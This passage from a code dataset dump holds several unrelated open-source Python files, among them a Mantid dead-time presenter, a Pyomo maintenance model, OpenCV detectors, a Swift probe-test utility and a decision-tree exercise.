handle_dead_time_workspace_selector_changed(self) -> None:\n \"\"\"The user changes the selected Table Workspace to use as dead time.\"\"\"\n table_name = self.view.selected_dead_time_workspace()\n if table_name == \"None\" or table_name == \"\":\n self._handle_dead_time_from_none_selected()\n else:\n error = self.model.validate_selected_dead_time_workspace(table_name)\n if error == \"\":\n self.set_dead_time_source_to_from_ads()\n else:\n self.view.set_selected_dead_time_workspace(\"None\")\n self._handle_selected_table_is_invalid()\n self._corrections_presenter.warning_popup(error)\n\n def _handle_selected_table_is_invalid(self) -> None:\n \"\"\"Handles when the selected dead time table workspace is invalid.\"\"\"\n # Triggers handle_dead_time_from_selector_changed\n self.view.set_dead_time_from_data_file_selected()\n\n def handle_dead_time_browse_clicked(self) -> None:\n \"\"\"User selects the option to Browse for a nexus file to load dead times from.\"\"\"\n filename = self.view.show_file_browser_and_return_selection([\"nxs\"], [\"\"], multiple_files=False)[0]\n if filename != \"\":\n name = self._load_file_containing_dead_time(filename)\n if name is not None:\n self.view.populate_dead_time_workspace_selector(get_table_workspace_names_from_ADS())\n error = self.model.validate_selected_dead_time_workspace(name)\n if error == \"\":\n self.view.switch_to_using_a_dead_time_table_workspace(name)\n else:\n self._corrections_presenter.warning_popup(error)\n\n def handle_pre_process_and_counts_calculated(self) -> None:\n \"\"\"Handles when MuonPreProcess and counts workspaces have been calculated.\"\"\"\n self.update_dead_time_info_text_in_view()\n\n def update_dead_time_info_text_in_view(self) -> None:\n \"\"\"Update the dead time info label in the view.\"\"\"\n if self.model.is_dead_time_source_from_data_file() or self.model.is_dead_time_source_from_workspace():\n self.view.set_dead_time_average_and_range(\n self._corrections_presenter.current_run_string(), self.model.dead_times_range(), self.model.dead_times_average()\n )\n else:\n self.view.set_dead_time_info_text(\"No dead time correction\")\n\n def set_dead_time_source_to_from_file(self) -> None:\n \"\"\"Sets the dead time source to be from the data file and notifies the GUI to recalculate the corrections.\"\"\"\n self.model.set_dead_time_source_to_from_file()\n self._notify_perform_dead_time_corrections()\n\n def set_dead_time_source_to_from_ads(self) -> None:\n \"\"\"Sets the dead time source to be the ADS and notifies the GUI to recalculate the corrections.\"\"\"\n self.model.set_dead_time_source_to_from_ads(self.view.selected_dead_time_workspace())\n self._notify_perform_dead_time_corrections()\n\n def set_dead_time_source_to_none(self) -> None:\n \"\"\"Sets the dead time source to be none and notifies the GUI to recalculate the corrections.\"\"\"\n self.model.set_dead_time_source_to_none()\n self._notify_perform_dead_time_corrections()\n\n def _set_dead_time_widgets_visible(self, workspace_mode_visible: bool, other_file_mode_visible: bool) -> None:\n \"\"\"Sets which dead time widgets are visible.\"\"\"\n self.view.set_dead_time_workspace_selector_visible(workspace_mode_visible)\n self.view.set_dead_time_other_file_visible(other_file_mode_visible)\n\n def _load_file_containing_dead_time(self, filename: str) -> str:\n \"\"\"Attempts to load a Nexus cycle file containing a dead time table workspace.\"\"\"\n try:\n name = load_dead_time_from_filename(filename)\n except Exception:\n self._corrections_presenter.warning_popup(\n \"The 
file provided has an unexpected format. The file should be \" \"of the same instrument and cycle as the raw data.\"\n )\n return None\n\n if name == \"\":\n self._corrections_presenter.warning_popup(\"The file provided does not contain dead time data.\")\n return None\n return name\n\n def _notify_perform_dead_time_corrections(self) -> None:\n \"\"\"A notification event to trigger the calculation of the dead time corrections.\"\"\"\n self._corrections_presenter.disable_editing_notifier.notify_subscribers()\n self._corrections_presenter.perform_corrections_notifier.notify_subscribers()\n self._corrections_presenter.enable_editing_notifier.notify_subscribers()\n","repo_name":"mantidproject/mantid","sub_path":"qt/python/mantidqtinterfaces/mantidqtinterfaces/Muon/GUI/Common/corrections_tab_widget/dead_time_corrections_presenter.py","file_name":"dead_time_corrections_presenter.py","file_ext":"py","file_size_in_byte":8433,"program_lang":"python","lang":"en","doc_type":"code","stars":199,"dataset":"github-code","pt":"39"}
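Presenters wired like this are usually unit-tested by mocking out the view, model, and parent presenter; a hypothetical sketch (not a test from the Mantid codebase):

from unittest import mock

view, model, corrections = mock.Mock(), mock.Mock(), mock.Mock()
presenter = DeadTimeCorrectionsPresenter(view, model, corrections)

view.is_dead_time_from_data_file_selected.return_value = True
presenter.handle_dead_time_from_selector_changed()

model.set_dead_time_source_to_from_file.assert_called_once()
corrections.perform_corrections_notifier.notify_subscribers.assert_called_once()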
+{"seq_id":"11735922080","text":"import appdaemon.plugins.hass.hassapi as hass\nimport random\n\nclass woIsSomeoneIntent(hass.Hass):\n\n def initialize(self):\n return\n\n def getIntentResponse(self, slots, devicename):\n try:\n ############################################\n # an example Intent to show how you can change text\n # based on sensor states or time\n ############################################\n if self.slots[\"person\"] in self.args[\"household\"]:\n ############################################\n # decide if a person is guest or not\n ############################################\n if self.get_state(\"sensor.\" + self.slots[\"person\"]) == \"In bed\":\n ############################################\n # assumes that there are sensors for every person \n # with a state if thet are in Bed\n ############################################\n text = self.random_arg(self.args[\"inBed\"])\n elif self.get_state(\"sensor.kellertime\") == \"ja\":\n ############################################\n # assumes that there is a sensor thats set to \"ja\"\n # for a certain event\n ############################################\n text = self.random_arg(self.args[\"kellerTime\"])\n elif self.now_is_between(\"18:00:00\",\"18:30:00\"):\n ############################################\n # at dinertime give another text\n ############################################\n text = self.random_arg(self.args[\"diner\"])\n elif self.slots[\"person\"] == \"olinde\":\n if self.now_is_between(\"16:00:00\",\"17:30:00\"):\n ############################################\n # text for a certain person at a certain time\n ############################################\n text = self.random_arg(self.args[\"Olinde\"][\"couch\"])\n elif self.now_is_between(\"17:30:00\",\"18:00:00\"):\n ############################################\n # text for a certain person at a certain time\n ############################################\n text = self.random_arg(self.args[\"Olinde\"][\"cooking\"])\n else:\n text = self.random_arg(self.args[\"Olinde\"][\"somethingElse\"])\n elif self.slots[\"person\"] == \"rene\":\n if self.now_is_between(\"19:00:00\",\"20:00:00\"):\n ############################################\n # text for a certain person at a certain time\n ############################################\n text = self.random_arg(self.args[\"Rene\"][\"couch\"])\n else:\n text = self.random_arg(self.args[\"Rene\"][\"somethingElse\"])\n else:\n text = self.random_arg(self.args[\"Other\"][\"somethingElse\"])\n else:\n text = self.random_arg(self.args[\"Other\"][\"somethingElse\"])\n except: \n text = self.args[\"Error\"]\n return text\n\n def random_arg(self,argName):\n ############################################\n # pick a random text from a list\n ############################################\n if isinstance(argName,list):\n text = random.choice(argName)\n else:\n text = argname\n return text\n","repo_name":"ReneTode/Alexa-Appdaemon-App","sub_path":"apps/internet/alexa/example_intents/woIsSomeone/woIsSomeoneIntent.py","file_name":"woIsSomeoneIntent.py","file_ext":"py","file_size_in_byte":3735,"program_lang":"python","lang":"de","doc_type":"code","stars":10,"dataset":"github-code","pt":"39"}
+{"seq_id":"16667754697","text":"# -*- coding: utf-8 -*-\n# 用于将各专辑文件夹下的歌曲文件搬到同一个文件夹里边, 使用前请把 neteaseMusicPath 改成自己电脑上的路径\n# 特别注意路径末尾的 \\\\\n# zhian.h@qq.com\n# python flat_music.py\n\nimport io\nimport os\nimport sys\nimport shutil\n\nsys.stdout = io.TextIOWrapper(\n sys.stdout.buffer, encoding='utf-8') # 改变标准输出的默认编码\n\nneteaseMusicPath = \"D:\\\\houzhian\\\\Music\\\\iTunes\\\\iTunes Media\\\\Music\\\\\"\noutputPath = \"D:\\\\houzhian\\\\Music\\\\iTunes\\\\iTunes Media\\\\output\\\\\"\n\n\ndef stealFile(path, outputPath):\n for roots, dirs, files in os.walk(path):\n for file in files:\n try:\n shutil.move(os.path.join(roots, file), outputPath)\n print(os.path.join(roots, file))\n except Exception as e:\n print(e)\n pass\n for dir in dirs:\n stealFile(dir, outputPath)\n\n\nif __name__ == '__main__':\n stealFile(neteaseMusicPath, outputPath)\n","repo_name":"jaan-hou/NeteaseCloudMusic-tools","sub_path":"flat_music.py","file_name":"flat_music.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"34489179630","text":"from pyomo.environ import *\nimport numpy as np\n\nmodel = ConcreteModel()\nTT = 5#5\nmodel.T = RangeSet(0, TT-1) # time periods\n\n# i0 = 5.0 # initial inventory\n# c = 4.6 # setup cost\n# h_pos = 0.7 # inventory holding cost\n# h_neg = 1.2 # shortage cost\n# P = 5.0 # maximum production amount\n# # demand during period t\n# d = {1: 5.0, 2:7.0, 3:6.2, 4:3.1, 5:1.7}\n\nn_condition = 3\nn_operation = 3\nmodel.n_condition = RangeSet(0, n_condition-1)\nmodel.n_operation = RangeSet(0, n_operation-1)\n\n\nN = 1000\n\ns0 = [0.25, 0.7, 0.05]\n\ncon1_m_performance = np.asarray([[1, 0, 0], [1, 0, 0], [0.99, 0.01, 0]])\ncon2_m_performance = np.asarray([[0, 1, 0], [0.5, 0.5, 0], [0.99, 0.01, 0]])\ncon3_m_performance = np.asarray([[0, 0, 1], [0.1, 0.3, 0.6], [0.99, 0.01, 0]])\ncon_m_performance = np.zeros([n_condition, n_operation, n_condition])\ncon_m_performance[0, :] = con1_m_performance\ncon_m_performance[1, :] = con2_m_performance\ncon_m_performance[2, :] = con3_m_performance\n\ndegradeP = np.asarray([[0.7, 0.3, 0], [0, 0.8, 0.2], [0, 0, 1]])\nmaintenance_cost = np.asarray([[0, 0, 0], [30, 50, 100], [500, 500, 1000]])\n\n# define the variables\n#model.y = Var(model.T, domain=Binary)\n#model.x = Var(model.T, domain=NonNegativeReals)\nmodel.x = Var(RangeSet(TT), RangeSet(n_condition * (n_operation - 1)), initialize=0.6, bounds=(0, 1)) #action\n#model.x = Set(initialize=1.01*np.zeros([model.T, (n_condition * (n_operation - 1))]), domain=NonNegativeReals, bounds = (0, 1), ordered = True) #action\nmodel.u = Var(RangeSet(TT),RangeSet(n_condition * n_operation), initialize = 0, within=NonNegativeReals) #action\n#model.s = Var(RangeSet(TT), RangeSet(n_condition), domain=NonNegativeReals) #state\nmodel.costi = Var(RangeSet(TT), initialize=0, domain=NonNegativeReals) #cost\nmodel.ii = Var(RangeSet(TT), RangeSet(n_condition), initialize = 0, domain=NonNegativeReals)\nmodel.iii = Var(RangeSet(TT), initialize = 0, domain=NonNegativeReals)\n#model.aa = Var(RangeSet(1), domain=NonNegativeReals)\n\n\nuu = np.zeros(TT * n_operation * n_condition)\nss0 = np.zeros([TT + 1, n_condition])\nss0[0, :] = s0\n\n#constraint\ndef time_action(m, t):\n #print(t)\n for tj in m.n_condition:\n #print(tj)\n aa = 0\n for tk in m.n_operation:\n #print(tk)\n if tk == 0:\n uu[np.ravel_multi_index([t, tj * n_operation + tk], [TT, n_operation * n_condition])] = \\\n value(m.x[t + 1, tj * (n_operation - 1) + tk + 1])\n m.u[t + 1, tj * n_operation + tk + 1] = \\\n value(m.x[t + 1, tj * (n_operation - 1) + tk + 1])\n aa += uu[np.ravel_multi_index([t, tj * n_operation + tk], [TT, n_operation * n_condition])]\n\n if tk < n_operation - 1 and tk > 0:\n uu[np.ravel_multi_index([t, tj * n_operation + tk], [TT, n_operation * n_condition])] = \\\n (m.x[t + 1, tj * (n_operation - 1) + tk + 1].value) * (1 - aa)\n m.u[t + 1, tj * n_operation + tk + 1] = \\\n (m.x[t + 1, tj * (n_operation - 1) + tk + 1].value) * (1 - aa)\n aa += uu[np.ravel_multi_index([t, tj * n_operation + tk], [TT, n_operation * n_condition])]\n\n if tk == n_operation - 1:\n uu[np.ravel_multi_index([t, tj * n_operation + tk], [TT, n_operation * n_condition])] = 1 - aa\n m.u[t + 1, tj * n_operation + tk + 1] = 1 - aa\n\n\n uu0 = uu[t * n_operation * n_condition : (t+1) * n_operation * n_condition]\n\n\n for ti in m.n_condition:\n ss0[t+1, :] += ((ss0[t, ti] * uu0[ti * n_operation : (ti + 1) * n_operation]).dot(con_m_performance[ti, :])).dot(degradeP)\n m.costi[t + 1] = value(m.costi[t + 1]) + N * uu0[ti * n_operation : (ti + 1) * 
n_operation].dot(maintenance_cost[:, ti])\n \n if ss0[t+1, n_condition-1] > 0.05:\n m.costi[t + 1] = value(m.costi[t + 1]) + 1e15\n \n for j in range(n_condition):\n m.ii[t+1, j+1] = ss0[t+1, j]\n\n return m.ii[t+1, n_condition] == ss0[t+1, n_condition-1]\n\nmodel.action = Constraint(model.T, rule=time_action)\n\n\ndef last_condition(m, t):\n m.iii[t + 1] = m.ii[t+1, n_condition].value\n return m.iii[t + 1] -0.05 <= 0\n\nmodel.last_con = Constraint(model.T, rule=last_condition)\n#model.last_con_ct = Constraint(model.T, rule=last_condition_const)\n\n\n# define the cost function\ndef obj_rule(m):\n return sum(m.costi[ti + 1] for ti in m.T)\n\nmodel.obj = Objective(rule=obj_rule)\n\n# solve the problem\nimport cplex\nimport sys\nsys.path.append('/opt/ibm/ILOG/CPLEX_Studio_Community129/cplex/bin/x86-64_linux')\nsolver = SolverFactory('cplex', executable = \"/opt/ibm/ILOG/CPLEX_Studio_Community129/cplex/bin/x86-64_linux/cplex\")#('glpk')\nsolution = solver.solve(model) #, executable = \"/opt/ibm/ILOG/CPLEX_Studio_Community129/cplex/bin/x86-64_linux/cplex\")\nmodel.action.pprint()\nmodel.last_con.pprint()\n\nfrom pyomo.opt import SolverStatus, TerminationCondition\nif (solution.solver.status == SolverStatus.ok) and (solution.solver.termination_condition == TerminationCondition.optimal):\n print(\"Solution is feasible and optimal\")\n print(\"Objective function value = \", model.obj())\nelif solution.solver.termination_condition == TerminationCondition.infeasible:\n print (\"Failed to find solution.\")\nelse:\n # something else is wrong\n print(str(solution.solver))\n# print the results\nfor t in model.T:\n #print(model.x[2, 3].value)\n print('Period: {0}, Prod. Amount: {1}'.format(t, uu[np.ravel_multi_index([t, 0], [TT, n_operation * n_condition]): (np.ravel_multi_index([t, n_operation * n_condition-1], [TT, n_operation * n_condition])+1)]))","repo_name":"Jueming6/LPRT","sub_path":"pyomo_maintenance.py","file_name":"pyomo_maintenance.py","file_ext":"py","file_size_in_byte":5586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"5820012277","text":"import imutils\r\nimport numpy as np\r\nimport cv2 as cv\r\nfrom imutils.object_detection import non_max_suppression\r\n\r\n\r\nfrom Models.CallProvider import CallProvider\r\nfrom Models.Connections import FramesConnection\r\n\r\n\r\nclass Detector:\r\n __classifier = None\r\n class_detection = \"\"\r\n n_frames = 20\r\n\r\n def getRects(self, frame):\r\n return []\r\n\r\n def showFrame(self, frame):\r\n frame = imutils.resize(frame)\r\n cv.imshow(\"Detector\", frame)\r\n cv.waitKey(1)\r\n\r\n def find(__db_frames):\r\n\r\n # class which permit to save frames\r\n f = FramesConnection()\r\n\r\n # class which call directly the phones of clients in case of detection\r\n cp = CallProvider()\r\n\r\n # variable which\r\n one_shot = True\r\n\r\n # open the cam in read mode\r\n cap = cv.VideoCapture(0, cv.CAP_DSHOW)\r\n # counter of consecutive faces detected in the frames\r\n i = 0\r\n\r\n while True:\r\n ret, frame = cap.read()\r\n\r\n # no frames stop\r\n if not ret:\r\n break\r\n\r\n # transformation from RGB to Gray chanel\r\n gray = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)\r\n\r\n rect = __db_frames.getRects(frame)\r\n\r\n for (x, y, w, h) in rect:\r\n # put the rectangles in the image\r\n cv.rectangle(frame, (x, y), (x + w, y + h), (255, 0, 0), 2)\r\n # put the text in the frames\r\n cv.putText(frame, __db_frames.class_detection, (x, y - 10), cv.FONT_ITALIC, 0.9, (36, 255, 12), 2)\r\n\r\n # count the number of faces detected\r\n n_face = len(rect)\r\n i += 1\r\n\r\n # reset false positive face\r\n if n_face == 0:\r\n i = 0\r\n\r\n if i > __db_frames.n_frames:\r\n #cp.doCall()\r\n i = 0\r\n\r\n # check if there are faces\r\n is_face = (n_face > 0)\r\n\r\n # post the frames\r\n if is_face and one_shot:\r\n # TODO: find the correct format of frames for mongoDB\r\n f.post(\"face\", is_face)\r\n one_shot = False\r\n\r\n __db_frames.showFrame(frame)\r\n\r\n\r\nclass DetectorFace(Detector):\r\n class_detection = \"Face\"\r\n path_mask = 'rsc/haarcascade_frontalface_default.xml'\r\n\r\n def __init__(self, scale_factor=1.1, min_neighbors=5):\r\n self.__classifier = cv.CascadeClassifier(self.path_mask)\r\n self.scale_factor = scale_factor\r\n self.min_neighbors = min_neighbors\r\n\r\n def getRects(self, frame):\r\n return self.__classifier.detectMultiScale(frame, self.scale_factor, self.min_neighbors)\r\n\r\n\r\nclass DetectorPedestrian(Detector):\r\n class_detection = \"Pedestrian\"\r\n\r\n def __init__(self, win_stride=(4, 4), padding=(8, 8), scale=1.05, probs=None, overlap_thresholding=0.50):\r\n self.__classifier = cv.HOGDescriptor()\r\n self.__classifier.setSVMDetector(cv.HOGDescriptor_getDefaultPeopleDetector())\r\n self.win_stride = win_stride\r\n self.padding = padding\r\n self.scale = scale\r\n self.probs = probs\r\n self.overlap_trasholding = overlap_thresholding\r\n\r\n def getRects(self, frame):\r\n # detect people in the gray frame\r\n rects, _ = self.__classifier.detectMultiScale(frame, winStride=self.win_stride, padding=self.padding,\r\n scale=self.scale)\r\n\r\n # apply non-maxima suppression to the bounding boxes using a\r\n # fairly large overlap threshold to try to maintain overlapping\r\n # boxes that are still people\r\n rects = np.array([[x, y, x + w, y + h] for (x, y, w, h) in rects])\r\n pick = non_max_suppression(rects, probs=self.probs, overlapThresh=self.overlap_trasholding)\r\n return 
pick\r\n","repo_name":"GianfilippoBellin/raspberryPi-faceAlarm","sub_path":"Models/Detectors.py","file_name":"Detectors.py","file_ext":"py","file_size_in_byte":3818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"9388875559","text":"#!/usr/bin/python -u\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nfrom __future__ import print_function\nimport functools\nimport sys\nfrom io import BytesIO\nimport itertools\nimport uuid\nfrom optparse import OptionParser\nimport random\n\nimport six\nfrom six.moves.urllib.parse import urlparse, parse_qs, quote\n\nfrom swift.common.manager import Manager\nfrom swift.common import utils, ring\nfrom swift.common.internal_client import InternalClient, UnexpectedResponse\nfrom swift.common.storage_policy import POLICIES\nfrom swift.common.http import HTTP_NOT_FOUND\n\nfrom swiftclient import client, get_auth, ClientException\n\nfrom test.probe import PROXY_BASE_URL\nfrom test.probe.common import ENABLED_POLICIES\n\nTIMEOUT = 60\n\n\ndef meta_command(name, bases, attrs):\n \"\"\"\n Look for attrs with a truthy attribute __command__ and add them to an\n attribute __commands__ on the type that maps names to decorated methods.\n The decorated methods' doc strings also get mapped in __docs__.\n\n Also adds a method run(command_name, *args, **kwargs) that will\n execute the method mapped to the name in __commands__.\n \"\"\"\n commands = {}\n docs = {}\n for attr, value in attrs.items():\n if getattr(value, '__command__', False):\n commands[attr] = value\n # methods always have a __doc__ attribute, sometimes empty\n docs[attr] = (getattr(value, '__doc__', None) or\n 'perform the %s command' % attr).strip()\n attrs['__commands__'] = commands\n attrs['__docs__'] = docs\n\n def run(self, command, *args, **kwargs):\n return self.__commands__[command](self, *args, **kwargs)\n attrs.setdefault('run', run)\n return type(name, bases, attrs)\n\n\ndef command(f):\n f.__command__ = True\n return f\n\n\n@six.add_metaclass(meta_command)\nclass BaseBrain(object):\n def _setup(self, account, container_name, object_name,\n server_type, policy):\n self.account = account\n self.container_name = container_name\n self.object_name = object_name\n server_list = ['%s-server' % server_type] if server_type else ['all']\n self.servers = Manager(server_list)\n policies = list(ENABLED_POLICIES)\n random.shuffle(policies)\n self.policies = itertools.cycle(policies)\n\n o = object_name if server_type == 'object' else None\n c = container_name if server_type in ('object', 'container') else None\n if server_type in ('container', 'account'):\n if policy:\n raise TypeError('Metadata server brains do not '\n 'support specific storage policies')\n self.policy = None\n self.ring = ring.Ring(\n '/etc/swift/%s.ring.gz' % server_type)\n elif server_type == 'object':\n if not policy:\n raise TypeError('Object BrainSplitters need to '\n 'specify the storage policy')\n self.policy = policy\n policy.load_ring('/etc/swift')\n self.ring = policy.object_ring\n else:\n raise ValueError('Unknown server_type: %r' % server_type)\n self.server_type = server_type\n\n self.part, self.nodes = self.ring.get_nodes(self.account, c, o)\n\n self.node_numbers = [n['id'] + 1 for n in self.nodes]\n if 1 in self.node_numbers 
and 2 in self.node_numbers:\n self.primary_numbers = (1, 2)\n self.handoff_numbers = (3, 4)\n else:\n self.primary_numbers = (3, 4)\n self.handoff_numbers = (1, 2)\n\n @command\n def start_primary_half(self):\n \"\"\"\n start servers 1 & 2\n \"\"\"\n tuple(self.servers.start(number=n) for n in self.primary_numbers)\n\n @command\n def stop_primary_half(self):\n \"\"\"\n stop servers 1 & 2\n \"\"\"\n tuple(self.servers.stop(number=n) for n in self.primary_numbers)\n\n @command\n def start_handoff_half(self):\n \"\"\"\n start servers 3 & 4\n \"\"\"\n tuple(self.servers.start(number=n) for n in self.handoff_numbers)\n\n @command\n def stop_handoff_half(self):\n \"\"\"\n stop servers 3 & 4\n \"\"\"\n tuple(self.servers.stop(number=n) for n in self.handoff_numbers)\n\n @command\n def put_container(self, policy_index=None):\n \"\"\"\n put container with next storage policy\n \"\"\"\n\n if policy_index is not None:\n policy = POLICIES.get_by_index(int(policy_index))\n if not policy:\n raise ValueError('Unknown policy with index %s' % policy)\n elif not self.policy:\n policy = next(self.policies)\n else:\n policy = self.policy\n\n headers = {'X-Storage-Policy': policy.name}\n self.client.put_container(self.container_name, headers=headers)\n\n @command\n def delete_container(self):\n \"\"\"\n delete container\n \"\"\"\n self.client.delete_container(self.container_name)\n\n @command\n def put_object(self, headers=None, contents=None):\n \"\"\"\n issue put for test object\n \"\"\"\n self.client.put_object(self.container_name, self.object_name,\n headers=headers, contents=contents)\n\n @command\n def delete_object(self):\n \"\"\"\n issue delete for test object\n \"\"\"\n self.client.delete_object(self.container_name, self.object_name)\n\n @command\n def get_object(self):\n \"\"\"\n issue GET for test object\n \"\"\"\n return self.client.get_object(self.container_name, self.object_name)\n\n\nclass PublicBrainClient(object):\n def __init__(self, url, token):\n self.url = url\n self.token = token\n self.account = utils.split_path(urlparse(url).path, 2, 2)[1]\n\n def put_container(self, container_name, headers):\n return client.put_container(self.url, self.token, container_name,\n headers=headers)\n\n def post_container(self, container_name, headers):\n return client.post_container(self.url, self.token, container_name,\n headers)\n\n def delete_container(self, container_name):\n return client.delete_container(self.url, self.token, container_name)\n\n def put_object(self, container_name, object_name, headers, contents,\n query_string=None):\n return client.put_object(self.url, self.token, container_name,\n object_name, headers=headers,\n contents=contents, query_string=query_string)\n\n def delete_object(self, container_name, object_name):\n try:\n client.delete_object(self.url, self.token,\n container_name, object_name)\n except ClientException as err:\n if err.http_status != HTTP_NOT_FOUND:\n raise\n\n def head_object(self, container_name, object_name):\n return client.head_object(self.url, self.token, container_name,\n object_name)\n\n def get_object(self, container_name, object_name, query_string=None):\n return client.get_object(self.url, self.token,\n container_name, object_name,\n query_string=query_string)\n\n\ndef translate_client_exception(m):\n @functools.wraps(m)\n def wrapper(*args, **kwargs):\n try:\n return m(*args, **kwargs)\n except UnexpectedResponse as err:\n raise ClientException(\n err.args[0],\n http_scheme=err.resp.environ['wsgi.url_scheme'],\n 
http_host=err.resp.environ['SERVER_NAME'],\n http_port=err.resp.environ['SERVER_PORT'],\n http_path=quote(err.resp.environ['PATH_INFO']),\n http_query=err.resp.environ['QUERY_STRING'],\n http_status=err.resp.status_int,\n http_reason=err.resp.explanation,\n http_response_content=err.resp.body,\n http_response_headers=err.resp.headers,\n )\n return wrapper\n\n\nclass InternalBrainClient(object):\n\n def __init__(self, conf_file, account='AUTH_test'):\n self.swift = InternalClient(conf_file, 'probe-test', 3)\n self.account = account\n\n @translate_client_exception\n def put_container(self, container_name, headers):\n return self.swift.create_container(self.account, container_name,\n headers=headers)\n\n @translate_client_exception\n def post_container(self, container_name, headers):\n return self.swift.set_container_metadata(self.account, container_name,\n headers)\n\n @translate_client_exception\n def delete_container(self, container_name):\n return self.swift.delete_container(self.account, container_name)\n\n def parse_qs(self, query_string):\n if query_string is not None:\n return {k: v[-1] for k, v in parse_qs(query_string).items()}\n\n @translate_client_exception\n def put_object(self, container_name, object_name, headers, contents,\n query_string=None):\n return self.swift.upload_object(BytesIO(contents), self.account,\n container_name, object_name,\n headers=headers,\n params=self.parse_qs(query_string))\n\n @translate_client_exception\n def delete_object(self, container_name, object_name):\n return self.swift.delete_object(\n self.account, container_name, object_name)\n\n @translate_client_exception\n def head_object(self, container_name, object_name):\n return self.swift.get_object_metadata(\n self.account, container_name, object_name)\n\n @translate_client_exception\n def get_object(self, container_name, object_name, query_string=None):\n status, headers, resp_iter = self.swift.get_object(\n self.account, container_name, object_name,\n params=self.parse_qs(query_string))\n return headers, b''.join(resp_iter)\n\n\nclass BrainSplitter(BaseBrain):\n def __init__(self, url, token, container_name='test', object_name='test',\n server_type='container', policy=None):\n self.client = PublicBrainClient(url, token)\n self._setup(self.client.account, container_name, object_name,\n server_type, policy)\n\n\nclass InternalBrainSplitter(BaseBrain):\n def __init__(self, conf, container_name='test', object_name='test',\n server_type='container', policy=None):\n self.client = InternalBrainClient(conf)\n self._setup(self.client.account, container_name, object_name,\n server_type, policy)\n\n\nparser = OptionParser('%prog [options] '\n '[:[,...]] [...]')\nparser.usage += '\\n\\nCommands:\\n\\t' + \\\n '\\n\\t'.join(\"%s - %s\" % (name, doc) for name, doc in\n BrainSplitter.__docs__.items())\nparser.add_option('-c', '--container', default='container-%s' % uuid.uuid4(),\n help='set container name')\nparser.add_option('-o', '--object', default='object-%s' % uuid.uuid4(),\n help='set object name')\nparser.add_option('-s', '--server_type', default='container',\n help='set server type')\nparser.add_option('-P', '--policy_name', default=None,\n help='set policy')\n\n\ndef main():\n options, commands = parser.parse_args()\n if not commands:\n parser.print_help()\n return 'ERROR: must specify at least one command'\n for cmd_args in commands:\n cmd = cmd_args.split(':', 1)[0]\n if cmd not in BrainSplitter.__commands__:\n parser.print_help()\n return 'ERROR: unknown command %s' % cmd\n url, token = 
get_auth(PROXY_BASE_URL + '/auth/v1.0',\n 'test:tester', 'testing')\n if options.server_type == 'object' and not options.policy_name:\n options.policy_name = POLICIES.default.name\n if options.policy_name:\n options.server_type = 'object'\n policy = POLICIES.get_by_name(options.policy_name)\n if not policy:\n return 'ERROR: unknown policy %r' % options.policy_name\n else:\n policy = None\n brain = BrainSplitter(url, token, options.container, options.object,\n options.server_type, policy=policy)\n for cmd_args in commands:\n parts = cmd_args.split(':', 1)\n command = parts[0]\n if len(parts) > 1:\n args = utils.list_from_csv(parts[1])\n else:\n args = ()\n try:\n brain.run(command, *args)\n except ClientException as e:\n print('**WARNING**: %s raised %s' % (command, e))\n print('STATUS'.join(['*' * 25] * 2))\n brain.servers.status()\n sys.exit()\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","repo_name":"openstack/swift","sub_path":"test/probe/brain.py","file_name":"brain.py","file_ext":"py","file_size_in_byte":13515,"program_lang":"python","lang":"en","doc_type":"code","stars":2518,"dataset":"github-code","pt":"39"}
+{"seq_id":"35997209613","text":"\"\"\"add sername\n\nRevision ID: 95c9c965f366\nRevises: f6eda7049057\nCreate Date: 2023-01-25 13:13:56.030336\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '95c9c965f366'\ndown_revision = 'f6eda7049057'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('author_model', schema=None) as batch_op:\n batch_op.add_column(sa.Column('surname', sa.String(length=32), server_default='ivanov', nullable=True))\n\n with op.batch_alter_table('quote_model', schema=None) as batch_op:\n batch_op.add_column(sa.Column('rating', sa.Integer(), server_default='1', nullable=True))\n\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('quote_model', schema=None) as batch_op:\n batch_op.drop_column('rating')\n\n with op.batch_alter_table('author_model', schema=None) as batch_op:\n batch_op.drop_column('surname')\n\n # ### end Alembic commands ###\n","repo_name":"EvgeniDorofeevskiy/flask2","sub_path":"migrations/versions/95c9c965f366_add_sername.py","file_name":"95c9c965f366_add_sername.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"70159971633","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.tree import DecisionTreeClassifier, plot_tree, export_graphviz, export_text\n\n\ntrain = pd.read_excel('data/lendingclubtraindata.xlsx')\nvalidation=pd.read_excel('data/lendingclubvaldata.xlsx')\ntest=pd.read_excel('data/lendingclubtestdata.xlsx')\n\n\n# store target column\ny_train = train['loan_status']\ny_val=validation['loan_status']\ny_test=test['loan_status']\n\n# exercise 1\nprob_1=len(y_train[y_train==1])/len(y_train)\nprob_2=1.0-prob_1\nprint(\"Initial entropy=\",-prob_1*np.log2(prob_1)-prob_2*np.log2(prob_2))\n\n# exercise 2\n# From the dataset we have that 60.40% own their home and 39.60% rent.\nhome_owners=train[train.home_ownership==1]\nhome_owner_prob=len(home_owners)/len(y_train)\nprint('prob own home=',home_owner_prob)\n# Loans were fully paid for 81.72 % of those who owned their home\nhome_owners_paid=home_owners[home_owners.loan_status==1]\nprob_home_owner_paid=len(home_owners_paid)/len(home_owners)\nprint('prob own home and paid =',prob_home_owner_paid)\n\n# 75.29% of those who rented paid their 